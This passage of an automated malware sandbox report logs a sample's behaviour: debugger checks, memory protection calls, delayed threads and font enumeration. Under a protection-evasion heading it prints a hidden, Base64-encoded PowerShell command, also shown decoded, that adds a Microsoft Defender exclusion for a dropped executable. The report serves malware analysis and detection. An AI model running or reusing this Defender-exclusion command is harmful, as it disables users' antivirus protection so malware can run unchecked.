                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBE7348 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,8_2_00000218BFBE7348
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 99875Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 99766Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 99641Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 99516Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 99406Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 99297Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 99188Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 99063Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 98938Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 98828Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 98719Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 98594Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 98484Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 98375Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 98189Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 98000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: D:\sources\migration\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: D:\sources\replacementmanifests\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: D:\sources\migration\wtr\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: D:\sources\replacementmanifests\hwvid-migration-2\Jump to behavior
                Source: 3UuxTH6FMX.exe, 00000008.00000002.2192668397.00000218BE206000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2097994185.00000218BE206000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 3UuxTH6FMX.exe, 00000008.00000002.2193147052.00000218BFD7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 9RM52QaURq.exe, 00000000.00000002.2140192999.0000000007250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeAPI call chain: ExitProcess graph end nodegraph_8-78718
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeAPI call chain: ExitProcess graph end nodegraph_8-78723
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD43F0 RtlAcquirePebLock,NtAllocateVirtualMemory,lstrcpyW,lstrcatW,NtAllocateVirtualMemory,lstrcpyW,RtlInitUnicodeString,RtlInitUnicodeString,LdrEnumerateLoadedModules,RtlReleasePebLock,CoInitializeEx,lstrcpyW,lstrcatW,CoGetObject,lstrcpyW,lstrcatW,CoGetObject,CoUninitialize,8_2_00000218BFBD43F0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFC0BB14 GetLastError,IsDebuggerPresent,OutputDebugStringW,8_2_00000218BFC0BB14
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFC0BB14 GetLastError,IsDebuggerPresent,OutputDebugStringW,8_2_00000218BFC0BB14
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB8B820 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,8_2_00000218BFB8B820
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBF7F00 GetProcessHeap,8_2_00000218BFBF7F00
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBDF920 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00000218BFBDF920
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFC222D8 SetUnhandledExceptionFilter,8_2_00000218BFC222D8
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA1200B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF7AA1200B0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA12D180 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF7AA12D180
                Source: C:\Users\user\Desktop\9RM52QaURq.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath 'C:\Users\jones\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exe'
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath 'C:\Users\jones\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exe'Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBC51E0 ShellExecuteW,8_2_00000218BFBC51E0
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcAJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess created: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exe "C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exe" Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -windowstyle hidden -encodedcommand qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaccaqwa6afwavqbzaguacgbzafwaagbvag4azqbzafwaqqbwahaarabhahqayqbcaewabwbjageababcafqazqbtahaaxaazadgasabzaheadwbiagwaygbhafwamwbvahuaeabuaegangbgae0awaauaguaeablacca
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -windowstyle hidden -encodedcommand qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaccaqwa6afwavqbzaguacgbzafwaagbvag4azqbzafwaqqbwahaarabhahqayqbcaewabwbjageababcafqazqbtahaaxaazadgasabzaheadwbiagwaygbhafwamwbvahuaeabuaegangbgae0awaauaguaeablaccaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,8_2_00000218BFBF6F14
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: EnumSystemLocalesW,8_2_00000218BFBEBC68
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00000218BFBF795C
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: GetLocaleInfoW,8_2_00000218BFBF7828
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_00000218BFBF7778
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: GetLocaleInfoW,8_2_00000218BFBF7620
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: GetLocaleInfoEx,FormatMessageA,8_2_00000218BFC09480
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: GetLocaleInfoW,8_2_00000218BFC22398
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00000218BFBF73D8
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: EnumSystemLocalesW,8_2_00000218BFBF7340
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: EnumSystemLocalesW,8_2_00000218BFBF7270
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: GetLocaleInfoW,8_2_00000218BFBEC1A8
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Users\user\Desktop\9RM52QaURq.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
